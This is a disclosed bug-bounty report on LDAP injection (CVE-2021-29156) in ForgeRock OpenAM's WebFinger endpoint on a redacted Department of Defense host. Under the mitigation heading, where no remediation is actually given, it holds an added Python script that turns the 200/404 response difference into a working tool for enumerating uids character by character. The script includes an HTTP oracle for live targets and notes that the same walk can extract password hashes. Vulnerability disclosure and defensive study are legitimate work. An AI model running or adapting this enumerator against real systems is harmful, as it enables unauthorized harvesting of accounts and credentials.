[CVE-2021-29156] LDAP Injection at https://██████

Disclosed: 2021-08-26 19:33:02 By whoisbinit To deptofdefense
Medium
Vulnerability Details
**Description:** https://█████ is vulnerable to CVE-2021-29156

## References

* https://hackerone.com/reports/1278050
* https://nvd.nist.gov/vuln/detail/CVE-2021-29156
* https://portswigger.net/research/hidden-oauth-attack-vectors
* https://github.com/projectdiscovery/nuclei-templates/blob/74db4223c11d27a934ca1c417aa4abca9e70ad35/cves/2021/CVE-2021-29156.yaml

## Impact

ForgeRock OpenAM before 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key.

## System Host(s)

███████

## Affected Product(s) and Version(s)

## CVE Numbers

CVE-2021-29156

## Steps to Reproduce

The references mentioned should be helpful for successful reproduction, especially the one I reported the day before (#1278050) and the PortSwigger one.

* Username starting with ██████████ exists: https://█████████/███/███████ [200 OK]
* Username starting with ███████ doesn't exist: https://██████████/██████████/█████████████ [404 Not Found]

For the 200 OK response, it also reveals the OpenAM instance address: **`███`**

A similar thing can be done for password enumeration as well. You can find the scripts I wrote for username and password enumeration in my earlier report at a different host.

## Suggested Mitigation/Remediation Actions
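The enumeration loop the report describes (a wildcard `*` injected into the `uid` filter behind the WebFinger `resource` parameter, with 200 OK / 404 Not Found as the yes/no oracle), written out as an added example. This is not the reporter's script and not OpenAM code; the endpoint path `/openam/oauth2/.well-known/webfinger`, the `http://x/<value>` resource form and the OIDC issuer `rel` are assumptions patterned on the referenced PortSwigger write-up, and the user list behind `mock_oracle` is constructed so the block runs offline. It goes a little beyond the report: instead of one prefix check it walks the whole alphabet depth-first, so uids that share a prefix are all recovered.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List

# Assumed endpoint layout (the report redacts the real host and path).
WEBFINGER_PATH = "/openam/oauth2/.well-known/webfinger"
OIDC_ISSUER_REL = "http://openid.net/specs/connect/1.0/issuer"


def build_probe_url(base_url: str, injected: str) -> str:
    """Build a WebFinger URL whose 'resource' carries the LDAP filter fragment.

    The vulnerable server copies the last path segment of the resource into an
    LDAP (uid=...) filter without escaping, so a trailing '*' turns the exact
    lookup into a prefix match. The 'http://x/' host is an assumed dummy value.
    """
    resource = "http://x/" + injected
    query = urllib.parse.urlencode({"resource": resource, "rel": OIDC_ISSUER_REL})
    return base_url.rstrip("/") + WEBFINGER_PATH + "?" + query


def http_oracle(base_url: str, timeout: float = 10.0) -> Callable[[str], bool]:
    """Return an oracle mapping an injected filter fragment to 'did anything match?'.

    The report's signal: 200 OK when some directory entry matches the filter,
    404 Not Found when none does. Any other status is treated as an error.
    """
    def probe(injected: str) -> bool:
        req = urllib.request.Request(build_probe_url(base_url, injected))
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status == 200
        except urllib.error.HTTPError as err:
            if err.code == 404:
                return False
            raise
    return probe


def ldap_wildcard_match(pattern: str, value: str) -> bool:
    """Emulate an LDAP substring filter: '*' matches any run of characters,
    and uid comparison is case-insensitive as it is for caseIgnoreMatch."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, value, flags=re.IGNORECASE) is not None


def mock_oracle(uids: Iterable[str]) -> Callable[[str], bool]:
    """Constructed stand-in for the vulnerable server (no network needed):
    True when at least one uid in the fake directory matches the filter."""
    uids = list(uids)
    return lambda injected: any(ldap_wildcard_match(injected, u) for u in uids)


def enumerate_uids(probe: Callable[[str], bool], alphabet: str,
                   max_len: int = 32) -> List[str]:
    """Recover every uid spelled over `alphabet`, one character at a time.

    Each step asks "does any uid start with <prefix><c>?" via a trailing '*'.
    An exact probe (no wildcard) detects that the prefix is itself a complete
    uid, so values sharing a prefix (alice, alicia) are both recovered.
    Cost: len(alphabet) requests per recovered character, plus one exact probe.
    """
    found: List[str] = []

    def walk(prefix: str) -> None:
        if prefix and probe(prefix):
            found.append(prefix)
        if len(prefix) >= max_len:
            return
        for ch in alphabet:
            if probe(prefix + ch + "*"):
                walk(prefix + ch)

    walk("")
    return sorted(found)


if __name__ == "__main__":
    # Offline demo against the constructed directory; swap in
    # http_oracle("https://sso.example.test") to run against a real target.
    oracle = mock_oracle(["alice", "alicia", "bob"])
    print(enumerate_uids(oracle, "abcdefghijklmnopqrstuvwxyz"))
```

The same walk recovers any attribute the injected filter can reach, which is why the advisory talks about character-by-character retrieval of password hashes; the request budget (26 probes per character for a lowercase alphabet, more once digits and punctuation are added) is what makes this noisy in server logs and worth rate-limiting and alerting on.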
Report Stats
  • Report ID: 1278891
  • State: Closed
  • Substate: resolved
  • Upvotes: 3